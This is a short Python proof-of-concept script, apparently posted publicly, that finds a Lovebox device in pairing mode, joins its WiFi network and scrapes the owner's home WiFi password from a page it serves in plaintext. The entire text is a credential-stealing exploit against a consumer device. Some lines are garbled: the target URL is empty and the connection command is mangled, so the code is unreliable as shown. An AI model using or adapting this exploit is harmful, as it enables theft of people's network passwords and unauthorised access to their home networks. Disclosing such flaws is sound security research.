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3 years ago
#! /bin/python3
# Proof of concept code for stealing the WiFi password of a network with a Lovebox connected
# The Lovebox must be in pairing mode
from wifi import Cell, Scheme
import subprocess
import requests
import re
from colorama import init, Fore, Style
# Add pretty colors
reset = Style.RESET_ALL
goodtick = Fore.BLUE + "[" + Fore.GREEN + "+" + Fore.BLUE + "] " + reset
badtick = Fore.BLUE + "[" + Fore.RED + "!" + Fore.BLUE + "] " + reset
# Get the router URL
url = ""
target = ""
# List all the SSIDS and assign to schemes
ssids = [cell.ssid for cell in Cell.all('wlp5s0')]
schemes = list(Scheme.all())
# Check for the Lovebox SSID
for i in ssids:
# If lovebox is found, set it as the target
if "Lovebox" in str(i):
print(goodtick + Fore.GREEN + "Lovebox device found broadcasting SSID")# + Fore.RED + str(i))
target = str(i)
# If Lovebox is not found, exit
if "Lovebox" not in str(ssids):
print(badtick + Fore.RED + "Lovebox network not found...")
# Connect to the lovebox network
print(goodtick + Fore.GREEN+"Connecting to Lovebox SSID")["nmcli", "dev", "wifi", "connect", target], stdout=subprocess.DEVNULL)
print(goodtick +"Retrieving Password")
# Get URL with plaintext password
text = requests.get(url).text
# Clean up string
password = text.partition("Your WiFi password")
sep = '\'><'
password = password[2]
stripped = password.split(sep,1)[0]
stripped = stripped.replace("\' value=\'","")
# Display password
print(goodtick + Fore.GREEN+"The WiFi Password for the network it is connected to is: " + Fore.RED + stripped)